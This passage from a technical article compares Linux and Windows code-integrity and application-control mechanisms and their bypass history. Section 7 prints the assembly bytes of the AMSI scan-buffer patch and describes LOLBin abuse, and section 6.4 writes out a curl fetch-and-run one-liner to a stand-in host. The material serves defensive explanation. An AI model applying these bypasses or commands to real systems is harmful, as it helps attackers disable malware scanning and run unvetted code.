&lt;p&gt;The kernel is not asked &quot;what is the SHA-256 of this file?&quot; at &lt;code&gt;op=EXECUTE&lt;/code&gt; time. It is asked &quot;did this file come from a dm-verity device whose root hash matches one of our trusted signatures?&quot; The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.&lt;/p&gt;
&lt;h3&gt;fs-verity (Linux 5.4, November 2019): O(log n) per page&lt;/h3&gt;
&lt;p&gt;The cryptographic complement is fs-verity [@kernel-org-filesystems-fsverityhtml], upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts&apos;o at Google. The kernel docs describe the trick: &quot;fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size.&quot;&lt;/p&gt;
&lt;p&gt;The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity&apos;s digest directly through the &lt;code&gt;digest_type=verity&lt;/code&gt; modifier in its policy language.&lt;/p&gt;

The breakthrough was not a stronger check. It was moving the check out of the attacker&apos;s address space.
&lt;p&gt;Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from &quot;xattr next to the file&quot; to &quot;HMAC-keyed xattr, key sealed to TPM PCRs&quot;. HVCI moved the kernel-mode verifier from &quot;in the kernel the attacker can patch&quot; to &quot;in a secure kernel the attacker cannot reach without breaking the hypervisor&quot;. IPE moved the per-access decision from &quot;recompute a file&apos;s hash&quot; to &quot;look up a precomputed property&quot;. Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.&lt;/p&gt;
&lt;p&gt;The crypto was already strong. The breakthrough was the geometry of where the verifier lived.&lt;/p&gt;
&lt;p&gt;By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.&lt;/p&gt;
&lt;h2&gt;6. The stack today, side by side&lt;/h2&gt;
&lt;p&gt;Eleven moving parts. Here is how they line up.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Linux&lt;/th&gt;
&lt;th&gt;Windows&lt;/th&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;IMA appraise + EVM&lt;/td&gt;
&lt;td&gt;App Control (WDAC) UMCI&lt;/td&gt;
&lt;td&gt;User-mode code integrity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kernel module signing&lt;/td&gt;
&lt;td&gt;App Control + HVCI driver enforcement&lt;/td&gt;
&lt;td&gt;Kernel-mode code integrity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;fs-verity + dm-verity&lt;/td&gt;
&lt;td&gt;HVCI page-level W^X + signed catalogues&lt;/td&gt;
&lt;td&gt;Page-level integrity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AppArmor / SELinux&lt;/td&gt;
&lt;td&gt;(no direct analogue; closest is AppContainer / ASR)&lt;/td&gt;
&lt;td&gt;Mandatory access control&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;fapolicyd&lt;/td&gt;
&lt;td&gt;App Control + AppLocker&lt;/td&gt;
&lt;td&gt;User-space allowlist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPE&lt;/td&gt;
&lt;td&gt;App Control (FilePath / hash rules)&lt;/td&gt;
&lt;td&gt;Property-based code integrity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(no direct analogue)&lt;/td&gt;
&lt;td&gt;AMSI&lt;/td&gt;
&lt;td&gt;Script content scan&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(no direct analogue)&lt;/td&gt;
&lt;td&gt;Smart App Control + ISG&lt;/td&gt;
&lt;td&gt;Cloud reputation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.&lt;/p&gt;
&lt;h3&gt;6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Linux IMA + EVM&lt;/th&gt;
&lt;th&gt;WDAC (App Control)&lt;/th&gt;
&lt;th&gt;IPE&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Enforcement layer&lt;/td&gt;
&lt;td&gt;VFS / LSM hook (file open, mmap, exec)&lt;/td&gt;
&lt;td&gt;PE loader (kernel CI, user-mode CI)&lt;/td&gt;
&lt;td&gt;LSM hook on &lt;code&gt;op=EXECUTE&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Identity primitive&lt;/td&gt;
&lt;td&gt;File-content hash or &lt;code&gt;imasig&lt;/code&gt; / &lt;code&gt;modsig&lt;/code&gt; / &lt;code&gt;sigv3&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Authenticode chain, hash, FilePath, or ISG&lt;/td&gt;
&lt;td&gt;dm-verity root hash / fs-verity digest&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Policy expression&lt;/td&gt;
&lt;td&gt;Procedural rules (&lt;code&gt;func=&lt;/code&gt; / &lt;code&gt;mask=&lt;/code&gt; / &lt;code&gt;fsmagic=&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Signed XML compiled to binary &lt;code&gt;.p7b&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Signed plain-text DFA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Worst-case per-access&lt;/td&gt;
&lt;td&gt;O(n) hash on first access; O(1) cached&lt;/td&gt;
&lt;td&gt;O(1) cached; O(n) hash on cache miss&lt;/td&gt;
&lt;td&gt;O(1) (properties precomputed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fail-closed mode&lt;/td&gt;
&lt;td&gt;Yes (appraise)&lt;/td&gt;
&lt;td&gt;Yes (enforced)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote-attestation friendly&lt;/td&gt;
&lt;td&gt;Yes (TPM PCR 10)&lt;/td&gt;
&lt;td&gt;Indirect (Measured Boot logs)&lt;/td&gt;
&lt;td&gt;Indirect&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bypass arms race&lt;/td&gt;
&lt;td&gt;Whole-disk swap (countered by EVM key sealing)&lt;/td&gt;
&lt;td&gt;LOLBins (Microsoft block list + community LOLBAS)&lt;/td&gt;
&lt;td&gt;Limited surface (DFA-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The IMA policy ABI [@kernel-org-testing-imapolicy] documents the full rule grammar: &lt;code&gt;action [condition ...]&lt;/code&gt; where action is one of &lt;code&gt;measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash&lt;/code&gt;, and conditions select on &lt;code&gt;func=&lt;/code&gt;, &lt;code&gt;mask=&lt;/code&gt;, &lt;code&gt;fsmagic=&lt;/code&gt;, &lt;code&gt;fsuuid=&lt;/code&gt;, &lt;code&gt;uid=&lt;/code&gt;, &lt;code&gt;fowner=&lt;/code&gt;, LSM-label predicates, and the all-important &lt;code&gt;appraise_type=&lt;/code&gt; modifier that names the signature scheme. IMA template management [@docs-kernel-org-ima-templateshtml] controls &lt;em&gt;what&lt;/em&gt; gets recorded per measurement-list entry; the two templates used in practice today are &lt;code&gt;ima-ng&lt;/code&gt; (&lt;code&gt;d-ng|n-ng&lt;/code&gt;: hash-algo-prefixed digest plus name) and &lt;code&gt;ima-sigv2&lt;/code&gt; (&lt;code&gt;d-ngv2|n-ng|sig&lt;/code&gt;: versioned digest plus name plus signature).&lt;/p&gt;
&lt;p&gt;WDAC&apos;s policy rule reference [@learn-microsoft-com-to-create] defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary &lt;code&gt;.p7b&lt;/code&gt; CIPolicy.&lt;/p&gt;
&lt;p&gt;The same doc records the default-on audit-mode behaviour that has surprised many operators: &quot;We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts.&quot; The Enabled:UMCI flag is what flips a WDAC policy from kernel-only to full user-mode enforcement.&lt;/p&gt;

flowchart LR
  PE[PE load request] --&amp;gt; AC[Parse Authenticode signature]
  AC --&amp;gt; RM[Match rule set]
  RM --&amp;gt; P[Publisher / cert rule?]
  P --&amp;gt;|hit| AL[Allow]
  P --&amp;gt;|miss| H[Hash rule?]
  H --&amp;gt;|hit| AL
  H --&amp;gt;|miss| FP[FilePath rule?]
  FP --&amp;gt;|hit| AL
  FP --&amp;gt;|miss| MI[Managed Installer?]
  MI --&amp;gt;|hit| AL
  MI --&amp;gt;|miss| ISG[Intelligent Security Graph?]
  ISG --&amp;gt;|hit| AL
  ISG --&amp;gt;|miss| DEF[Default action]
  AL --&amp;gt; BL{&quot;In bypass-list deny?&quot;}
  BL --&amp;gt;|yes| BLK[Block]
  BL --&amp;gt;|no| LOAD[Loader continues]
  DEF --&amp;gt; BLK
&lt;h3&gt;6.2 Mandatory access control: AppArmor vs SELinux&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;AppArmor&lt;/th&gt;
&lt;th&gt;SELinux&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Model&lt;/td&gt;
&lt;td&gt;Path-based allowlist per binary&lt;/td&gt;
&lt;td&gt;Type-enforcement on subject x object x class&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Storage of policy state&lt;/td&gt;
&lt;td&gt;In-memory DFA loaded from user space&lt;/td&gt;
&lt;td&gt;&lt;code&gt;security.selinux&lt;/code&gt; xattr + compiled &lt;code&gt;policy.31&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Granularity&lt;/td&gt;
&lt;td&gt;Profile per executable&lt;/td&gt;
&lt;td&gt;Per-type, per-class, per-operation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Survives file rename&lt;/td&gt;
&lt;td&gt;No (path is the identity)&lt;/td&gt;
&lt;td&gt;Yes (xattr travels with inode)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default-on distros&lt;/td&gt;
&lt;td&gt;Ubuntu, openSUSE, SLES&lt;/td&gt;
&lt;td&gt;RHEL, Fedora, Oracle Linux, Android, ChromeOS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authoring tools&lt;/td&gt;
&lt;td&gt;&lt;code&gt;aa-genprof&lt;/code&gt;, &lt;code&gt;aa-logprof&lt;/code&gt;, &lt;code&gt;aa-enforce&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;audit2allow&lt;/code&gt;, &lt;code&gt;semodule&lt;/code&gt;, refpolicy, &lt;code&gt;udica&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;AppArmor&apos;s kernel documentation [@docs-kernel-org-lsm-apparmorhtml] describes the model directly: &quot;AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task &apos;profiles&apos; being created and loaded from user space.&quot; A profile reads like a rule file rather than a label algebra:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux&apos;s compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the Wikipedia summary [@en-wikipedia-org-security-enhancedlinux] calls Mandatory Access Control for multi-level security. Smack [@schaufler-ca-com] is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.&lt;/p&gt;

Red Hat&apos;s `fapolicyd` is the answer for operators who want App Control-style allowlisting without rebuilding the kernel. Trust is inherited from the RPM database; the daemon sits on the kernel&apos;s `fanotify` permission channel and answers ALLOW or DENY on every `open` and `exec`. Per the RHEL hardening guide [@access-redhat-com-fapolicydsecurity-hardening], rule files in `/etc/fapolicyd/rules.d/` are concatenated in lexicographic order into `compiled.rules`. The Red Hat-shipped numbered prefixes are 10 (language interpreters), 20 (dracut), 21 (updaters), 30 (patterns), 40/41/42 (ELF), 70 (trusted languages), 72 (shell), 90 (deny-execute), 95 (allow-open). First-match-wins evaluation means operators adding custom rules must give their file a number lower than 90 to ensure their `allow` is reached before the catch-all deny.
&lt;h3&gt;6.3 Hypervisor-anchored CI: HVCI&lt;/h3&gt;
&lt;p&gt;HVCI&apos;s runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s HVCI documentation [@learn-microsoft-com-code-integrity] names the dependency: &quot;Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance.&quot; Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.&lt;/p&gt;
&lt;p&gt;HVCI hardware prerequisites per the OEM VBS guidance [@learn-microsoft-com-oem-vbs]: 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).&lt;/p&gt;
&lt;h3&gt;6.4 Script-level inspection: AMSI vs Linux&apos;s gap&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;AMSI&lt;/th&gt;
&lt;th&gt;Linux IMA on scripts&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;What it sees&lt;/td&gt;
&lt;td&gt;Deobfuscated script buffer at execution time&lt;/td&gt;
&lt;td&gt;Whole-file content at &lt;code&gt;open&lt;/code&gt; or &lt;code&gt;mmap&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Coverage&lt;/td&gt;
&lt;td&gt;PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge&lt;/td&gt;
&lt;td&gt;Any file whose &lt;code&gt;func=FILE_CHECK&lt;/code&gt; rule matches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Provider model&lt;/td&gt;
&lt;td&gt;COM &lt;code&gt;IAntimalwareProvider&lt;/code&gt; per process&lt;/td&gt;
&lt;td&gt;None; kernel verifies signature directly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defends against runtime obfuscation&lt;/td&gt;
&lt;td&gt;Yes (sees final buffer)&lt;/td&gt;
&lt;td&gt;No (sees file as written)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust boundary&lt;/td&gt;
&lt;td&gt;Wrong (in-process; patchable by attacker)&lt;/td&gt;
&lt;td&gt;Right (kernel-side; attacker cannot patch)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and &lt;code&gt;Invoke-Expression&lt;/code&gt; evaluations that never touched the filesystem. IMA&apos;s hash is final at file write time and tells you exactly nothing about what &lt;code&gt;bash -c &quot;$(curl evil)&quot;&lt;/code&gt; will execute.&lt;/p&gt;

The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the `[System.Reflection]` namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the `amsiInitFailed` flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.
&lt;h3&gt;6.5 Cloud reputation: Smart App Control&lt;/h3&gt;
&lt;p&gt;Smart App Control [@learn-microsoft-com-business-appcontrol] ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point introduced in Windows 11 version 22H2 to bring application control to home users. On every fresh install SAC starts in &lt;em&gt;evaluation&lt;/em&gt; mode for 48 hours. Microsoft&apos;s cloud reputation service silently observes the user&apos;s app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled by user, policy, or the auto-disable rule, it can only be re-enabled by performing a clean install of Windows. A Settings &amp;gt; Reset This PC is not sufficient.&lt;/p&gt;

Three quirks operators must understand. First, evaluation lasts 48 hours and is silent. Second, enterprise-managed (Intune, AAD-joined, GPO-managed) devices auto-disable at evaluation end. Third, disable is one-way: there is no &quot;restart evaluation&quot; path. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. Consumers with a small app footprint and no IT team get a cloud-driven allowlist for free; everyone else is expected to author a policy.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Once Smart App Control is off on a device, it can only be re-enabled by performing a clean install of Windows. A Settings &amp;gt; Reset This PC does not re-enable SAC. Treat enabling SAC as a deployment decision, not a casual toggle.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.6 fs-verity as the per-file Merkle layer&lt;/h3&gt;
&lt;p&gt;For the data-at-rest performance story, fs-verity&apos;s &lt;code&gt;ioctl(FS_IOC_ENABLE_VERITY)&lt;/code&gt; builds the Merkle tree, persists it next to the file, and switches the file to read-only. &lt;code&gt;FS_IOC_MEASURE_VERITY&lt;/code&gt; returns the digest in constant time. IMA&apos;s policy language gained &lt;code&gt;appraise_type=sigv3&lt;/code&gt; and the &lt;code&gt;digest_type=verity&lt;/code&gt; modifier so a rule like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;asks the filesystem for the file&apos;s fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.&lt;/p&gt;
&lt;p&gt;Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.&lt;/p&gt;
&lt;h2&gt;7. Bypass arms races&lt;/h2&gt;
&lt;p&gt;Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.&lt;/p&gt;
&lt;h3&gt;The AMSI bypass family&lt;/h3&gt;
&lt;p&gt;The three single-shot techniques from Section 4 -- prologue patch, &lt;code&gt;amsiInitFailed&lt;/code&gt; flag flip, library unload -- have all been answered by partial mitigations. Microsoft has hardened AMSI provider loading [@learn-microsoft-com-interface-portal] to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to &lt;code&gt;amsi.dll&lt;/code&gt;. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip &lt;code&gt;AmsiUtils.amsiInitFailed&lt;/code&gt;. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.&lt;/p&gt;

The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in.

The simplest in-memory patch overwrites `AmsiScanBuffer`&apos;s prologue with a six-byte sequence that loads `AMSI_RESULT_CLEAN` (0) into EAX and returns:&lt;pre&gt;&lt;code&gt;xor eax, eax    ; 31 C0
ret             ; C3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or, depending on the calling convention the patcher targets:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges or a syscall to apply.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;The WDAC LOLBin arms race&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s App Control bypass list [@learn-microsoft-com-bypass-appcontrol] is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include &lt;code&gt;mshta.exe&lt;/code&gt;, &lt;code&gt;wscript.exe&lt;/code&gt;, &lt;code&gt;cscript.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;Microsoft.Build.dll&lt;/code&gt;, &lt;code&gt;windbg.exe&lt;/code&gt;, &lt;code&gt;cdb.exe&lt;/code&gt;, &lt;code&gt;kd.exe&lt;/code&gt;, &lt;code&gt;dotnet.exe&lt;/code&gt;, &lt;code&gt;csi.exe&lt;/code&gt;, &lt;code&gt;rcsi.exe&lt;/code&gt;, &lt;code&gt;addinprocess.exe&lt;/code&gt;, &lt;code&gt;addinutil.exe&lt;/code&gt;, &lt;code&gt;aspnet_compiler.exe&lt;/code&gt;, &lt;code&gt;bash.exe&lt;/code&gt;, &lt;code&gt;wsl.exe&lt;/code&gt;, &lt;code&gt;runscripthelper.exe&lt;/code&gt;, &lt;code&gt;system.management.automation.dll&lt;/code&gt;, and &lt;code&gt;webclnt.dll&lt;/code&gt; / &lt;code&gt;davsvc.dll&lt;/code&gt;. The community LOLBAS index [@lolbas-project-github-io] widens the field to roughly 200 entries with MITRE ATT&amp;amp;CK technique IDs.&lt;/p&gt;
&lt;p&gt;Tooling (the WDAC Wizard, AaronLocker, Microsoft&apos;s &lt;code&gt;ConfigCI&lt;/code&gt; PowerShell module, &lt;code&gt;CiTool.exe&lt;/code&gt;) automates merging the deny set into a base policy and onto Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.&lt;/p&gt;

A trusted binary, often shipped by the OS vendor and signed by the vendor&apos;s code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: `mshta.exe` to evaluate HTA scripts, `regsvr32.exe` to execute a remote scriptlet, `installutil.exe` to run code via a designed-for-development assembly loader.
&lt;h3&gt;fapolicyd permissive-window&lt;/h3&gt;
&lt;p&gt;This is not a cryptographic bypass; it is the architectural choice (userspace daemon over &lt;code&gt;fanotify&lt;/code&gt;) showing its operational seam. A privileged operator who sets &lt;code&gt;permissive=1&lt;/code&gt; to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI&apos;s &quot;the verifier is in another address space&quot; guarantee.&lt;/p&gt;
&lt;h3&gt;IMA / EVM offline-key attacks&lt;/h3&gt;
&lt;p&gt;EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid &lt;code&gt;security.evm&lt;/code&gt; HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step &quot;until we add a TPM&quot; and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.&lt;/p&gt;
&lt;h3&gt;The cross-stack symmetry&lt;/h3&gt;
&lt;p&gt;Both lineages obey two architectural rules, and both have at least one place where they break each rule:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bypass class&lt;/th&gt;
&lt;th&gt;Linux instance&lt;/th&gt;
&lt;th&gt;Windows instance&lt;/th&gt;
&lt;th&gt;Root cause&lt;/th&gt;
&lt;th&gt;Partial mitigation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Verifier shares address space with attacker&lt;/td&gt;
&lt;td&gt;(script interpreters; no in-kernel interpreter scanner)&lt;/td&gt;
&lt;td&gt;AMSI prologue patch, &lt;code&gt;amsiInitFailed&lt;/code&gt; flag flip&lt;/td&gt;
&lt;td&gt;Software-only protection of an in-process secret is impossible&lt;/td&gt;
&lt;td&gt;ETW patch detection, signed providers, Constrained Language Mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust grant coarser than exploit unit&lt;/td&gt;
&lt;td&gt;RPM trust pre-fapolicyd integrity-mode addition&lt;/td&gt;
&lt;td&gt;WDAC Publisher rules + LOLBins&lt;/td&gt;
&lt;td&gt;Trust algebra cannot express &quot;Microsoft except mshta&quot; with one rule&lt;/td&gt;
&lt;td&gt;Hash-level denies, growing block list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reference value reachable by attacker&lt;/td&gt;
&lt;td&gt;IMA without EVM&lt;/td&gt;
&lt;td&gt;(HVCI moved the kernel verifier out of reach)&lt;/td&gt;
&lt;td&gt;Reference value next to the file under attacker control&lt;/td&gt;
&lt;td&gt;EVM HMAC sealed to TPM PCR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verifier is killable&lt;/td&gt;
&lt;td&gt;fapolicyd daemon failure&lt;/td&gt;
&lt;td&gt;(HVCI verifier is hypervisor-isolated)&lt;/td&gt;
&lt;td&gt;Verifier liveness is part of the trust assumption&lt;/td&gt;
&lt;td&gt;TPM-sealed boot policy + kernel-mode fallback&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not &quot;wrong&quot;, it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.&lt;/p&gt;
&lt;p&gt;The lesson from both rows of pivots is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.&lt;/p&gt;
&lt;p&gt;These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.&lt;/p&gt;
&lt;h2&gt;8. What the theory says&lt;/h2&gt;
&lt;p&gt;Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.&lt;/p&gt;
&lt;h3&gt;Rice&apos;s theorem&lt;/h3&gt;
&lt;p&gt;Rice&apos;s 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns &quot;malicious&quot; or &quot;benign&quot; in finite time for every input.&lt;/p&gt;
&lt;p&gt;Every code-integrity stack on the market therefore reduces to the same shape: an &lt;em&gt;allowlist&lt;/em&gt; of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call &quot;malware detectors&quot; -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.&lt;/p&gt;
&lt;h3&gt;No software-only protection of an in-process secret&lt;/h3&gt;
&lt;p&gt;The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.&lt;/p&gt;
&lt;p&gt;AMSI&apos;s design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI&apos;s entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host&apos;s address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM&apos;s design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.&lt;/p&gt;
&lt;h3&gt;No verification of dynamically generated executable code&lt;/h3&gt;
&lt;p&gt;The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous &lt;code&gt;mmap&lt;/code&gt; followed by &lt;code&gt;mprotect(PROT_EXEC)&lt;/code&gt; all produce executable bytes that did not exist on disk and were never hashed.&lt;/p&gt;
